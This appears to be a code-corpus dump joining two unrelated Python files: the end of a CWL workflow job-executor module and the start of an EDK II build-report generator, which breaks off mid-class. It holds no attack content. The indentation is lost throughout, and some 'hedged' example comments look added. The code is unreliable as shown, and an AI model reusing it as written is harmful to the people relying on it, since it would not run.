from .workflow import Workflow, WorkflowJob, WorkflowJobStep
class JobExecutor(with_metaclass(ABCMeta, object)):
""" Abstract base job executor. """
def __init__(self):
# type: (...) -> None
self.final_output = [] # type: List
self.final_status = [] # type: List
self.output_dirs = set() # type: Set
def __call__(self, *args, **kwargs):
return self.execute(*args, **kwargs)
def output_callback(self, out, process_status):
""" Collect the final status and outputs. """
self.final_status.append(process_status)
self.final_output.append(out)
@abstractmethod
def run_jobs(self,
process, # type: Process
job_order_object, # type: Dict[Text, Any]
logger,
runtime_context # type: RuntimeContext
): # type: (...) -> None
""" Execute the jobs for the given Process. """
def execute(self,
process, # type: Process
job_order_object, # type: Dict[Text, Any]
runtime_context, # type: RuntimeContext
logger=_logger,
): # type: (...) -> Tuple[Optional[Dict[Text, Any]], Text]
""" Execute the process. """
if not runtime_context.basedir:
raise WorkflowException("Must provide 'basedir' in runtimeContext")
finaloutdir = None # Type: Optional[Text]
original_outdir = runtime_context.outdir
if isinstance(original_outdir, string_types):
finaloutdir = os.path.abspath(original_outdir)
runtime_context = runtime_context.copy()
runtime_context.outdir = tempfile.mkdtemp(
prefix=getdefault(runtime_context.tmp_outdir_prefix, DEFAULT_TMP_PREFIX))
self.output_dirs.add(runtime_context.outdir)
runtime_context.mutation_manager = MutationManager()
runtime_context.toplevel = True
runtime_context.workflow_eval_lock = threading.Condition(threading.RLock())
job_reqs = None
if "https://w3id.org/cwl/cwl#requirements" in job_order_object:
if process.metadata.get("http://commonwl.org/cwltool#original_cwlVersion") == 'v1.0':
raise WorkflowException(
"`cwl:requirements` in the input object is not part of CWL "
"v1.0. You can adjust to use `cwltool:overrides` instead; or you "
"can set the cwlVersion to v1.1.0-dev1 or greater and re-run with "
"--enable-dev.")
job_reqs = job_order_object["https://w3id.org/cwl/cwl#requirements"]
elif ("cwl:defaults" in process.metadata
and "https://w3id.org/cwl/cwl#requirements"
in process.metadata["cwl:defaults"]):
if process.metadata.get("http://commonwl.org/cwltool#original_cwlVersion") == 'v1.0':
raise WorkflowException(
"`cwl:requirements` in the input object is not part of CWL "
"v1.0. You can adjust to use `cwltool:overrides` instead; or you "
"can set the cwlVersion to v1.1.0-dev1 or greater and re-run with "
"--enable-dev.")
job_reqs = process.metadata["cwl:defaults"]["https://w3id.org/cwl/cwl#requirements"]
if job_reqs is not None:
for req in job_reqs:
process.requirements.append(req)
self.run_jobs(process, job_order_object, logger, runtime_context)
if self.final_output and self.final_output[0] is not None and finaloutdir is not None:
self.final_output[0] = relocateOutputs(
self.final_output[0], finaloutdir, self.output_dirs,
runtime_context.move_outputs, runtime_context.make_fs_access(""),
getdefault(runtime_context.compute_checksum, True),
path_mapper=runtime_context.path_mapper)
if runtime_context.rm_tmpdir:
if runtime_context.cachedir is None:
output_dirs = self.output_dirs # type: Iterable[Any]
else:
output_dirs = filter(lambda x: not x.startswith(
runtime_context.cachedir), self.output_dirs)
cleanIntermediate(output_dirs)
if self.final_output and self.final_status:
if runtime_context.research_obj is not None and \
isinstance(process, (JobBase, Process, WorkflowJobStep,
WorkflowJob)) and process.parent_wf:
process_run_id = None
name = "primary"
process.parent_wf.generate_output_prov(self.final_output[0],
process_run_id, name)
process.parent_wf.document.wasEndedBy(
process.parent_wf.workflow_run_uri, None, process.parent_wf.engine_uuid,
datetime.datetime.now())
process.parent_wf.finalize_prov_profile(name=None)
return (self.final_output[0], self.final_status[0])
return (None, "permanentFail")
class SingleJobExecutor(JobExecutor):
""" Default single-threaded CWL reference executor. """
def run_jobs(self,
process, # type: Process
job_order_object, # type: Dict[Text, Any]
logger,
runtime_context # type: RuntimeContext
): # type: (...) -> None
process_run_id = None # type: Optional[str]
# define provenance profile for single commandline tool
if not isinstance(process, Workflow) \
and runtime_context.research_obj is not None:
process.provenance_object = ProvenanceProfile(
runtime_context.research_obj,
full_name=runtime_context.cwl_full_name,
host_provenance=False,
user_provenance=False,
orcid=runtime_context.orcid,
# single tool execution, so RO UUID = wf UUID = tool UUID
run_uuid=runtime_context.research_obj.ro_uuid)
process.parent_wf = process.provenance_object
jobiter = process.job(job_order_object, self.output_callback,
runtime_context)
try:
for job in jobiter:
if job is not None:
if runtime_context.builder is not None:
job.builder = runtime_context.builder
if job.outdir is not None:
self.output_dirs.add(job.outdir)
if runtime_context.research_obj is not None:
if not isinstance(process, Workflow):
prov_obj = process.provenance_object
else:
prov_obj = job.prov_obj
if prov_obj:
runtime_context.prov_obj = prov_obj
prov_obj.evaluate(
process, job, job_order_object,
runtime_context.research_obj)
process_run_id =\
prov_obj.record_process_start(process, job)
runtime_context = runtime_context.copy()
runtime_context.process_run_id = process_run_id
job.run(runtime_context)
else:
logger.error("Workflow cannot make any more progress.")
break
except (ValidationException, WorkflowException): # pylint: disable=try-except-raise
raise
except Exception as err:
logger.exception("Got workflow error")
raise WorkflowException(Text(err))
class MultithreadedJobExecutor(JobExecutor):
"""
Experimental multi-threaded CWL executor.
Does simple resource accounting: it will not start a job unless
the required cores / RAM are available, but it makes no attempt
to optimize usage.
"""
def __init__(self): # type: () -> None
super(MultithreadedJobExecutor, self).__init__()
self.threads = set() # type: Set[threading.Thread]
self.exceptions = [] # type: List[WorkflowException]
self.pending_jobs = [] # type: List[Union[JobBase, WorkflowJob]]
self.pending_jobs_lock = threading.Lock()
self.max_ram = psutil.virtual_memory().available / 2**20
self.max_cores = psutil.cpu_count()
self.allocated_ram = 0
self.allocated_cores = 0
def select_resources(self, request, runtime_context): # pylint: disable=unused-argument
# type: (Dict[str, int], RuntimeContext) -> Dict[str, int]
""" Naïve check for available cpu cores and memory. """
result = {} # type: Dict[str, int]
maxrsc = {
"cores": self.max_cores,
"ram": self.max_ram
}
for rsc in ("cores", "ram"):
if request[rsc+"Min"] > maxrsc[rsc]:
raise WorkflowException(
"Requested at least %d %s but only %d available" %
(request[rsc+"Min"], rsc, maxrsc[rsc]))
if request[rsc+"Max"] < maxrsc[rsc]:
result[rsc] = request[rsc+"Max"]
else:
result[rsc] = maxrsc[rsc]
return result
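# Worked example (hedged, values illustrative): on a host with max_cores=8
# and max_ram=16000 MiB, a request of {"coresMin": 2, "coresMax": 4,
# "ramMin": 1024, "ramMax": 32000} yields {"cores": 4, "ram": 16000}: each
# resource is the requested Max clamped to what the host offers, while a
# Min above the host capacity raises WorkflowException.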
def _runner(self, job, runtime_context):
""" Job running thread. """
try:
job.run(runtime_context)
except WorkflowException as err:
_logger.exception("Got workflow error")
self.exceptions.append(err)
except Exception as err: # pylint: disable=broad-except
_logger.exception("Got workflow error")
self.exceptions.append(WorkflowException(Text(err)))
finally:
with runtime_context.workflow_eval_lock:
self.threads.remove(threading.current_thread())
if isinstance(job, JobBase):
self.allocated_ram -= job.builder.resources["ram"]
self.allocated_cores -= job.builder.resources["cores"]
runtime_context.workflow_eval_lock.notifyAll()
def run_job(self,
job, # type: Union[JobBase, WorkflowJob, None]
runtime_context # type: RuntimeContext
): # type: (...) -> None
""" Execute a single Job in a seperate thread. """
if job is not None:
with self.pending_jobs_lock:
self.pending_jobs.append(job)
with self.pending_jobs_lock:
n = 0
while (n+1) <= len(self.pending_jobs):
job = self.pending_jobs[n]
if isinstance(job, JobBase):
if ((job.builder.resources["ram"])
> self.max_ram
or (job.builder.resources["cores"])
> self.max_cores):
_logger.error(
'Job "%s" cannot be run, requests more resources (%s) '
'than available on this host (max ram %d, max cores %d)',
job.name, job.builder.resources,
self.max_ram,
self.max_cores)
self.pending_jobs.remove(job)
return
if ((self.allocated_ram + job.builder.resources["ram"])
> self.max_ram
or (self.allocated_cores + job.builder.resources["cores"])
> self.max_cores):
_logger.debug(
'Job "%s" cannot run yet, resources (%s) are not '
'available (already allocated ram is %d, allocated cores is %d, '
'max ram %d, max cores %d',
job.name, job.builder.resources,
self.allocated_ram,
self.allocated_cores,
self.max_ram,
self.max_cores)
n += 1
continue
thread = threading.Thread(target=self._runner, args=(job, runtime_context))
thread.daemon = True
self.threads.add(thread)
if isinstance(job, JobBase):
self.allocated_ram += job.builder.resources["ram"]
self.allocated_cores += job.builder.resources["cores"]
thread.start()
self.pending_jobs.remove(job)
def wait_for_next_completion(self, runtime_context):
# type: (RuntimeContext) -> None
""" Wait for jobs to finish. """
if runtime_context.workflow_eval_lock is not None:
runtime_context.workflow_eval_lock.wait()
if self.exceptions:
raise self.exceptions[0]
def run_jobs(self,
process, # type: Process
job_order_object, # type: Dict[Text, Any]
logger,
runtime_context # type: RuntimeContext
): # type: (...) -> None
jobiter = process.job(job_order_object, self.output_callback,
runtime_context)
if runtime_context.workflow_eval_lock is None:
raise WorkflowException(
"runtimeContext.workflow_eval_lock must not be None")
runtime_context.workflow_eval_lock.acquire()
for job in jobiter:
if job is not None:
if isinstance(job, JobBase):
job.builder = runtime_context.builder or job.builder
if job.outdir is not None:
self.output_dirs.add(job.outdir)
self.run_job(job, runtime_context)
if job is None:
if self.threads:
self.wait_for_next_completion(runtime_context)
else:
logger.error("Workflow cannot make any more progress.")
break
self.run_job(None, runtime_context)
while self.threads:
self.wait_for_next_completion(runtime_context)
self.run_job(None, runtime_context)
runtime_context.workflow_eval_lock.release()
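# --- Illustrative sketch (hedged) --------------------------------------------
# Example of how an executor is typically invoked: instantiate one, then call
# it with a loaded Process, a job order dict and a RuntimeContext whose
# 'basedir' is set (execute() requires it). The process and job-order objects
# are assumed to come from the usual cwltool loading machinery.
def _example_run_with_executor(process, job_order, runtime_context):
    # type: (Process, Dict[Text, Any], RuntimeContext) -> Tuple[Optional[Dict[Text, Any]], Text]
    executor = MultithreadedJobExecutor()  # or SingleJobExecutor()
    out, status = executor(process, job_order, runtime_context)
    return out, status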
|
BuildReport.py
|
## @file
# Routines for generating build report.
#
# This module contains the functionality to generate build report after
# build all target completes successfully.
#
# Copyright (c) 2010 - 2018, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
## Import Modules
#
import Common.LongFilePathOs as os
import re
import platform
import textwrap
import traceback
import sys
import time
import struct
import hashlib
import subprocess
import threading
from datetime import datetime
from StringIO import StringIO
from Common import EdkLogger
from Common.Misc import SaveFileOnChange
from Common.Misc import GuidStructureByteArrayToGuidString
from Common.Misc import GuidStructureStringToGuidString
from Common.BuildToolError import FILE_WRITE_FAILURE
from Common.BuildToolError import CODE_ERROR
from Common.BuildToolError import COMMAND_FAILURE
from Common.BuildToolError import FORMAT_INVALID
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.MultipleWorkspace import MultipleWorkspace as mws
import Common.GlobalData as GlobalData
from AutoGen.AutoGen import ModuleAutoGen
from Common.Misc import PathClass
from Common.StringUtils import NormPath
from Common.DataType import *
import collections
from Common.Expression import *
## Pattern to extract contents in EDK DXS files
gDxsDependencyPattern = re.compile(r"DEPENDENCY_START(.+)DEPENDENCY_END", re.DOTALL)
## Pattern to find total FV total size, occupied size in flash report intermediate file
gFvTotalSizePattern = re.compile(r"EFI_FV_TOTAL_SIZE = (0x[0-9a-fA-F]+)")
gFvTakenSizePattern = re.compile(r"EFI_FV_TAKEN_SIZE = (0x[0-9a-fA-F]+)")
## Pattern to find module size and time stamp in module summary report intermediate file
gModuleSizePattern = re.compile(r"MODULE_SIZE = (\d+)")
gTimeStampPattern = re.compile(r"TIME_STAMP = (\d+)")
## Pattern to find GUID value in flash description files
gPcdGuidPattern = re.compile(r"PCD\((\w+)[.](\w+)\)")
## Pattern to collect offset, GUID value pair in the flash report intermediate file
gOffsetGuidPattern = re.compile(r"(0x[0-9A-Fa-f]+) ([-A-Fa-f0-9]+)")
## Pattern to find module base address and entry point in fixed flash map file
gModulePattern = r"\n[-\w]+\s*\(([^,]+),\s*BaseAddress=%(Address)s,\s*EntryPoint=%(Address)s\)\s*\(GUID=([-0-9A-Fa-f]+)[^)]*\)"
gMapFileItemPattern = re.compile(gModulePattern % {"Address" : "(-?0[xX][0-9A-Fa-f]+)"})
## Pattern to find all module referenced header files in source files
gIncludePattern = re.compile(r'#include\s*["<]([^">]+)[">]')
gIncludePattern2 = re.compile(r"#include\s+EFI_([A-Z_]+)\s*[(]\s*(\w+)\s*[)]")
## Pattern to find the entry point for EDK module using EDKII Glue library
gGlueLibEntryPoint = re.compile(r"__EDKII_GLUE_MODULE_ENTRY_POINT__\s*=\s*(\w+)")
## Tags for MaxLength of line in report
gLineMaxLength = 120
## Tags for end of line in report
gEndOfLine = "\r\n"
## Tags for section start, end and separator
gSectionStart = ">" + "=" * (gLineMaxLength - 2) + "<"
gSectionEnd = "<" + "=" * (gLineMaxLength - 2) + ">" + "\n"
gSectionSep = "=" * gLineMaxLength
## Tags for subsection start, end and separator
gSubSectionStart = ">" + "-" * (gLineMaxLength - 2) + "<"
gSubSectionEnd = "<" + "-" * (gLineMaxLength - 2) + ">"
gSubSectionSep = "-" * gLineMaxLength
## The look up table to map PCD type to pair of report display type and DEC type
gPcdTypeMap = {
TAB_PCDS_FIXED_AT_BUILD : ('FIXED', TAB_PCDS_FIXED_AT_BUILD),
TAB_PCDS_PATCHABLE_IN_MODULE: ('PATCH', TAB_PCDS_PATCHABLE_IN_MODULE),
TAB_PCDS_FEATURE_FLAG : ('FLAG', TAB_PCDS_FEATURE_FLAG),
TAB_PCDS_DYNAMIC : ('DYN', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_HII : ('DYNHII', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_VPD : ('DYNVPD', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_EX : ('DEX', TAB_PCDS_DYNAMIC_EX),
TAB_PCDS_DYNAMIC_EX_HII : ('DEXHII', TAB_PCDS_DYNAMIC_EX),
TAB_PCDS_DYNAMIC_EX_VPD : ('DEXVPD', TAB_PCDS_DYNAMIC_EX),
}
## The look up table to map module type to driver type
gDriverTypeMap = {
SUP_MODULE_SEC : '0x3 (SECURITY_CORE)',
SUP_MODULE_PEI_CORE : '0x4 (PEI_CORE)',
SUP_MODULE_PEIM : '0x6 (PEIM)',
SUP_MODULE_DXE_CORE : '0x5 (DXE_CORE)',
SUP_MODULE_DXE_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_SAL_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_SMM_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_RUNTIME_DRIVER: '0x7 (DRIVER)',
SUP_MODULE_UEFI_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_UEFI_APPLICATION : '0x9 (APPLICATION)',
SUP_MODULE_SMM_CORE : '0xD (SMM_CORE)',
'SMM_DRIVER' : '0xA (SMM)', # Extension of module type to support PI 1.1 SMM drivers
SUP_MODULE_MM_STANDALONE : '0xE (MM_STANDALONE)',
SUP_MODULE_MM_CORE_STANDALONE : '0xF (MM_CORE_STANDALONE)'
}
## The look up table of the supported opcode in the dependency expression binaries
gOpCodeList = ["BEFORE", "AFTER", "PUSH", "AND", "OR", "NOT", "TRUE", "FALSE", "END", "SOR"]
##
# Writes a string to the file object.
#
# This function writes a string to the file object and a new line is appended
# afterwards. It can optionally wrap the string for better readability.
#
# @File The file object to write
# @String The string to be written to the file
# @Wrapper Indicates whether to wrap the string
#
def FileWrite(File, String, Wrapper=False):
if Wrapper:
String = textwrap.fill(String, 120)
File.write(String + gEndOfLine)
def ByteArrayForamt(Value):
IsByteArray = False
SplitNum = 16
ArrayList = []
if Value.startswith('{') and Value.endswith('}'):
Value = Value[1:-1]
ValueList = Value.split(',')
if len(ValueList) >= SplitNum:
IsByteArray = True
if IsByteArray:
if ValueList:
Len = len(ValueList)/SplitNum
for i, element in enumerate(ValueList):
ValueList[i] = '0x%02X' % int(element.strip(), 16)
if Len:
Id = 0
while (Id <= Len):
End = min(SplitNum*(Id+1), len(ValueList))
Str = ','.join(ValueList[SplitNum*Id : End])
if End == len(ValueList):
Str += '}'
ArrayList.append(Str)
break
else:
Str += ','
ArrayList.append(Str)
Id += 1
else:
ArrayList = [Value + '}']
return IsByteArray, ArrayList
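# Worked example (hedged): given a value with at least 16 comma-separated byte
# values inside braces, ByteArrayForamt returns (True, ArrayList) where each
# ArrayList entry holds up to 16 values re-formatted as '0x%02X' and the last
# entry ends with '}'. Values with fewer than 16 elements, or without
# surrounding braces, come back as (False, []).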
##
# Find all the header file that the module source directly includes.
#
# This function scans source code to find all header files the module may
# include. This is not fully accurate, but it is very effective at finding
# the header files the module might include via #include statements.
#
# @Source The source file name
# @IncludePathList The list of include path to find the source file.
# @IncludeFiles The dictionary of current found include files.
#
def FindIncludeFiles(Source, IncludePathList, IncludeFiles):
FileContents = open(Source).read()
#
# Find header files with pattern #include "XXX.h" or #include <XXX.h>
#
for Match in gIncludePattern.finditer(FileContents):
FileName = Match.group(1).strip()
for Dir in [os.path.dirname(Source)] + IncludePathList:
FullFileName = os.path.normpath(os.path.join(Dir, FileName))
if os.path.exists(FullFileName):
IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
break
#
# Find header files with pattern like #include EFI_PPI_CONSUMER(XXX)
#
for Match in gIncludePattern2.finditer(FileContents):
Key = Match.group(2)
Type = Match.group(1)
if "ARCH_PROTOCOL" in Type:
FileName = "ArchProtocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif "PROTOCOL" in Type:
FileName = "Protocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif "PPI" in Type:
FileName = "Ppi/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif TAB_GUID in Type:
FileName = "Guid/%(Key)s/%(Key)s.h" % {"Key" : Key}
else:
continue
for Dir in IncludePathList:
FullFileName = os.path.normpath(os.path.join(Dir, FileName))
if os.path.exists(FullFileName):
IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
break
## Split each lines in file
#
# This method is used to split the lines in a file so that the length of
# each line is less than MaxLength.
#
# @param Content The content of file
# @param MaxLength The Max Length of the line
#
def FileLinesSplit(Content=None, MaxLength=None):
ContentList = Content.split(TAB_LINE_BREAK)
NewContent = ''
NewContentList = []
for Line in ContentList:
while len(Line.rstrip()) > MaxLength:
LineSpaceIndex = Line.rfind(TAB_SPACE_SPLIT, 0, MaxLength)
LineSlashIndex = Line.rfind(TAB_SLASH, 0, MaxLength)
LineBackSlashIndex = Line.rfind(TAB_BACK_SLASH, 0, MaxLength)
if max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex) > 0:
LineBreakIndex = max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex)
else:
LineBreakIndex = MaxLength
NewContentList.append(Line[:LineBreakIndex])
Line = Line[LineBreakIndex:]
if Line:
NewContentList.append(Line)
for NewLine in NewContentList:
NewContent += NewLine + TAB_LINE_BREAK
NewContent = NewContent.replace(TAB_LINE_BREAK, gEndOfLine).replace('\r\r\n', gEndOfLine)
return NewContent
##
# Parse binary dependency expression section
#
# This utility class parses the dependency expression section and translate the readable
# GUID name and value.
#
class DepexParser(object):
##
# Constructor function for class DepexParser
#
# This constructor function collect GUID values so that the readable
# GUID name can be translated.
#
# @param self The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self._GuidDb = {}
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
for Protocol in Package.Protocols:
GuidValue = GuidStructureStringToGuidString(Package.Protocols[Protocol])
self._GuidDb[GuidValue.upper()] = Protocol
for Ppi in Package.Ppis:
GuidValue = GuidStructureStringToGuidString(Package.Ppis[Ppi])
self._GuidDb[GuidValue.upper()] = Ppi
for Guid in Package.Guids:
GuidValue = GuidStructureStringToGuidString(Package.Guids[Guid])
self._GuidDb[GuidValue.upper()] = Guid
##
# Parse the binary dependency expression files.
#
# This function parses the binary dependency expression file and translate it
# to the instruction list.
#
# @param self The object pointer
# @param DepexFileName The file name of binary dependency expression file.
#
def ParseDepexFile(self, DepexFileName):
DepexFile = open(DepexFileName, "rb")
DepexStatement = []
OpCode = DepexFile.read(1)
while OpCode:
Statement = gOpCodeList[struct.unpack("B", OpCode)[0]]
if Statement in ["BEFORE", "AFTER", "PUSH"]:
GuidValue = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X" % \
struct.unpack(PACK_PATTERN_GUID, DepexFile.read(16))
GuidString = self._GuidDb.get(GuidValue, GuidValue)
Statement = "%s %s" % (Statement, GuidString)
DepexStatement.append(Statement)
OpCode = DepexFile.read(1)
return DepexStatement
##
# Reports library information
#
# This class reports the module library subsection in the build report file.
#
class LibraryReport(object):
##
# Constructor function for class LibraryReport
#
# This constructor function generates LibraryReport object for
# a module.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
self.LibraryList = []
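        # An AutoGen version of 0x00010005 or later marks an EDKII style module;
        # only those get the extended library class/constructor/destructor details.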
if int(str(M.AutoGenVersion), 0) >= 0x00010005:
self._EdkIIModule = True
else:
self._EdkIIModule = False
for Lib in M.DependentLibraryList:
LibInfPath = str(Lib)
LibClassList = Lib.LibraryClass[0].LibraryClass
LibConstructorList = Lib.ConstructorList
            LibDestructorList = Lib.DestructorList
            LibDepexList = Lib.DepexExpression[M.Arch, M.ModuleType]
            LibTime = ''
            for LibAutoGen in M.LibraryAutoGenList:
                if LibInfPath == LibAutoGen.MetaFile.Path:
                    LibTime = LibAutoGen.BuildTime
                    break
            self.LibraryList.append((LibInfPath, LibClassList, LibConstructorList, LibDestructorList, LibDepexList, LibTime))
##
# Generate report for module library information
#
# This function generates report for the module library.
    # If the module is an EDKII style one, the additional library class, library
# constructor/destructor and dependency expression may also be reported.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if len(self.LibraryList) > 0:
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_LIBRARY)
FileWrite(File, gSubSectionSep)
for LibraryItem in self.LibraryList:
LibInfPath = LibraryItem[0]
FileWrite(File, LibInfPath)
#
# Report library class, library constructor and destructor for
# EDKII style module.
#
if self._EdkIIModule:
LibClass = LibraryItem[1]
EdkIILibInfo = ""
LibConstructor = " ".join(LibraryItem[2])
if LibConstructor:
EdkIILibInfo += " C = " + LibConstructor
LibDestructor = " ".join(LibraryItem[3])
if LibDestructor:
EdkIILibInfo += " D = " + LibDestructor
LibDepex = " ".join(LibraryItem[4])
if LibDepex:
EdkIILibInfo += " Depex = " + LibDepex
if LibraryItem[5]:
EdkIILibInfo += " Time = " + LibraryItem[5]
if EdkIILibInfo:
FileWrite(File, "{%s: %s}" % (LibClass, EdkIILibInfo))
else:
FileWrite(File, "{%s}" % LibClass)
FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module dependency expression subsection in the build report file.
#
class DepexReport(object):
##
# Constructor function for class DepexReport
#
# This constructor function generates DepexReport object for
    # a module. If the module source contains a DXS file (usually an EDK
    # style module), it uses the dependency in the DXS file; otherwise,
    # it uses the dependency expression from its own INF [Depex] section
    # and then merges it with the ones from its dependent libraries' INFs.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
self.Depex = ""
self._DepexFileName = os.path.join(M.BuildDir, "OUTPUT", M.Module.BaseName + ".depex")
ModuleType = M.ModuleType
if not ModuleType:
ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
if ModuleType in [SUP_MODULE_SEC, SUP_MODULE_PEI_CORE, SUP_MODULE_DXE_CORE, SUP_MODULE_SMM_CORE, SUP_MODULE_MM_CORE_STANDALONE, SUP_MODULE_UEFI_APPLICATION]:
return
for Source in M.SourceFileList:
if os.path.splitext(Source.Path)[1].lower() == ".dxs":
Match = gDxsDependencyPattern.search(open(Source.Path).read())
if Match:
self.Depex = Match.group(1).strip()
self.Source = "DXS"
break
else:
self.Depex = M.DepexExpressionList.get(M.ModuleType, "")
self.ModuleDepex = " ".join(M.Module.DepexExpression[M.Arch, M.ModuleType])
if not self.ModuleDepex:
self.ModuleDepex = "(None)"
LibDepexList = []
for Lib in M.DependentLibraryList:
LibDepex = " ".join(Lib.DepexExpression[M.Arch, M.ModuleType]).strip()
if LibDepex != "":
LibDepexList.append("(" + LibDepex + ")")
self.LibraryDepex = " AND ".join(LibDepexList)
if not self.LibraryDepex:
self.LibraryDepex = "(None)"
self.Source = "INF"
##
# Generate report for module dependency expression information
#
# This function generates report for the module dependency expression.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalDepexParser The platform global Dependency expression parser object
#
def GenerateReport(self, File, GlobalDepexParser):
if not self.Depex:
return
FileWrite(File, gSubSectionStart)
if os.path.isfile(self._DepexFileName):
try:
DepexStatements = GlobalDepexParser.ParseDepexFile(self._DepexFileName)
FileWrite(File, "Final Dependency Expression (DEPEX) Instructions")
for DepexStatement in DepexStatements:
FileWrite(File, " %s" % DepexStatement)
FileWrite(File, gSubSectionSep)
except:
EdkLogger.warn(None, "Dependency expression file is corrupted", self._DepexFileName)
FileWrite(File, "Dependency Expression (DEPEX) from %s" % self.Source)
if self.Source == "INF":
FileWrite(File, "%s" % self.Depex, True)
FileWrite(File, gSubSectionSep)
FileWrite(File, "From Module INF: %s" % self.ModuleDepex, True)
FileWrite(File, "From Library INF: %s" % self.LibraryDepex, True)
else:
FileWrite(File, "%s" % self.Depex)
FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module build flags subsection in the build report file.
#
class BuildFlagsReport(object):
##
# Constructor function for class BuildFlagsReport
#
# This constructor function generates BuildFlagsReport object for
    # a module. It reports the build tool chain tag and all the relevant
    # build flags used to build the module.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
BuildOptions = {}
#
# Add build flags according to source file extension so that
# irrelevant ones can be filtered out.
#
for Source in M.SourceFileList:
Ext = os.path.splitext(Source.File)[1].lower()
if Ext in [".c", ".cc", ".cpp"]:
BuildOptions["CC"] = 1
elif Ext in [".s", ".asm"]:
BuildOptions["PP"] = 1
BuildOptions["ASM"] = 1
elif Ext in [".vfr"]:
BuildOptions["VFRPP"] = 1
BuildOptions["VFR"] = 1
elif Ext in [".dxs"]:
BuildOptions["APP"] = 1
BuildOptions["CC"] = 1
elif Ext in [".asl"]:
BuildOptions["ASLPP"] = 1
BuildOptions["ASL"] = 1
elif Ext in [".aslc"]:
BuildOptions["ASLCC"] = 1
BuildOptions["ASLDLINK"] = 1
BuildOptions["CC"] = 1
elif Ext in [".asm16"]:
BuildOptions["ASMLINK"] = 1
BuildOptions["SLINK"] = 1
BuildOptions["DLINK"] = 1
#
# Save module build flags.
#
self.ToolChainTag = M.ToolChain
self.BuildFlags = {}
for Tool in BuildOptions:
self.BuildFlags[Tool + "_FLAGS"] = M.BuildOption.get(Tool, {}).get("FLAGS", "")
##
# Generate report for module build flags information
#
# This function generates report for the module build flags expression.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
FileWrite(File, gSubSectionStart)
FileWrite(File, "Build Flags")
FileWrite(File, "Tool Chain Tag: %s" % self.ToolChainTag)
for Tool in self.BuildFlags:
FileWrite(File, gSubSectionSep)
FileWrite(File, "%s = %s" % (Tool, self.BuildFlags[Tool]), True)
FileWrite(File, gSubSectionEnd)
##
# Reports individual module information
#
# This class reports the module section in the build report file.
# It comprises the module summary, module PCD, library, dependency expression,
# build flags sections.
#
class ModuleReport(object):
##
# Constructor function for class ModuleReport
#
# This constructor function generates ModuleReport object for
# a separate module in a platform build.
#
# @param self The object pointer
# @param M Module context information
# @param ReportType The kind of report items in the final report file
#
def __init__(self, M, ReportType):
self.ModuleName = M.Module.BaseName
self.ModuleInfPath = M.MetaFile.File
self.FileGuid = M.Guid
self.Size = 0
self.BuildTimeStamp = None
self.Hash = 0
self.DriverType = ""
if not M.IsLibrary:
ModuleType = M.ModuleType
if not ModuleType:
ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
#
            # If a module complies with PI 1.1, promote its module type to "SMM_DRIVER"
#
if ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
PiSpec = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "0x00010000")
if int(PiSpec, 0) >= 0x0001000A:
ModuleType = "SMM_DRIVER"
self.DriverType = gDriverTypeMap.get(ModuleType, "0x2 (FREE_FORM)")
self.UefiSpecVersion = M.Module.Specification.get("UEFI_SPECIFICATION_VERSION", "")
self.PiSpecVersion = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "")
self.PciDeviceId = M.Module.Defines.get("PCI_DEVICE_ID", "")
self.PciVendorId = M.Module.Defines.get("PCI_VENDOR_ID", "")
self.PciClassCode = M.Module.Defines.get("PCI_CLASS_CODE", "")
self.BuildTime = M.BuildTime
self._BuildDir = M.BuildDir
self.ModulePcdSet = {}
if "PCD" in ReportType:
#
            # Collect the set of all PCDs used by the module, referenced directly
            # or indirectly through the module INF. Also save their module INF
            # default values when they exist.
#
for Pcd in M.ModulePcdList + M.LibraryPcdList:
self.ModulePcdSet.setdefault((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Pcd.Type), (Pcd.InfDefaultValue, Pcd.DefaultValue))
self.LibraryReport = None
if "LIBRARY" in ReportType:
self.LibraryReport = LibraryReport(M)
self.DepexReport = None
if "DEPEX" in ReportType:
self.DepexReport = DepexReport(M)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport = BuildFlagsReport(M)
##
# Generate report for module information
#
    # This function generates the report for a separate module
    # in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalPcdReport The platform global PCD report object
# @param GlobalPredictionReport The platform global Prediction report object
# @param GlobalDepexParser The platform global Dependency expression parser object
